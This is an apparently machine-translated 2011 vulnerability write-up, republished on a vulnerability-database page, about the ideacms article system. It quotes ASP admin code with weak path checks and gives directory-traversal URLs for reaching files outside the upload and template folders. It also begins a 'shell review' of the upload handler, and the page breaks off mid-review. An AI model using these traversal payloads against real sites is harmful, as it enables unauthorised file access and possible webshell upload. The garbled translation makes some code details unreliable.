Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
myhack58佚名MYHACK58:62201131926
HistorySep 26, 2011 - 12:00 a.m.

ideacms article manage system vulnerability and fix-vulnerability warning-the black bar safety net

2011-09-2600:00:00
佚名
www.myhack58.com
7
JSON

'\admin\admin_upfile. asp

<%

'Slightly

dim folderList,folderNum,i,folderAttr,fileList,fileNum,j,the fileattr -, folder,filedir,filename,lastLevelPath

dim dirTemplate : dirTemplate=“…/Upload”

dim path : path=getForm(“path”,“get”) : if isNul(path) then path= dirTemplate

if left(path,9)<>“…/Upload” then alert “only allow editing of the Upload Directory”,“admin_upfile. asp” : die “”

'Slightly

%>

Judgment problems.

Using the method:

http://www./admin/admin_upfile.asp?path=…/Upload/…/…/

'\admin\admin_template. asp

<%

checkPower

'Slightly

dim folderList,folderNum,i,folderAttr,fileList,fileNum,j,the fileattr -, folder,filedir,filename,lastLevelPath

dim dirTemplate : dirTemplate=“…/template”

dim path : path=getForm(“path”,“get”) : if isNul(path) then path= dirTemplate

if left(path,1 1)<>“…/template” then alert “only allow editing of the template directory”,“admin_template. asp” : die “”

'Slightly

%>

Judgment problems.

Using the method:

http://www. /admin/admin_template. asp? action=edit&filedir=…/template/…/robots.txt

shell review:

'/admin/upload. asp

<%

'Slightly

attachdir=“/”+sitePath+“upload”'Upload File Save path, ending not with/

dirtype=2’1:by the day stored in the directory 2:on a monthly basis stored in the directory 3:Press the extension stored in the directory recommends the use of daily memory

maxattachsize=2 0 9 7 1 5 2’The maximum upload size, default is 2M

upext=“txt,rar,zip,jpg,jpeg,gif,png,swf,wmv,avi,wma,mp3,mid”'upload extension

'Slightly

if upfile. isErr=3 then

err=“Upload file extension required is:”+upext

else

err=upfile. ErrMessage

'Slightly

Dim tmpPath

isErr_=0

Set oFileStream = CreateObject (“ADODB. Stream”)

oFileStream. Type = 1

oFileStream. Mode = 3

oFileStream. CharSet = “gb2312”

'Slightly

tmpPath=Split(Path,“.”) (0)

FileExt=GetFileExt(Path)

if Over then

if isAllowExt(FileExt) then

oFileStream. SaveToFile tmpPath & “.” & FileExt,2

if Err. number<>0 then OutErr(“File Save error,please check the path,whether the existence of the Upload Directory! The file path to save to” & amp; tmpPath & “.” & FileExt)

Else

isErr_=3

ErrMessage_=“the suffix name of the file not allowed to upload!”

OutErr(“the suffix name of the file not allowed to upload”)

End if

Else

'Slightly

Public Function FileData(Item)

isErr_=0

if file. Exists(Item) then

if isAllowExt(File(Item). FileExt) then

'Slightly

Else

isErr_=3

ErrMessage_=“the suffix name of the file not allowed to upload”

OutErr(“the suffix name of the file not allowed to upload”)

FileData=“”

End if

else

[1] [2] next

JSON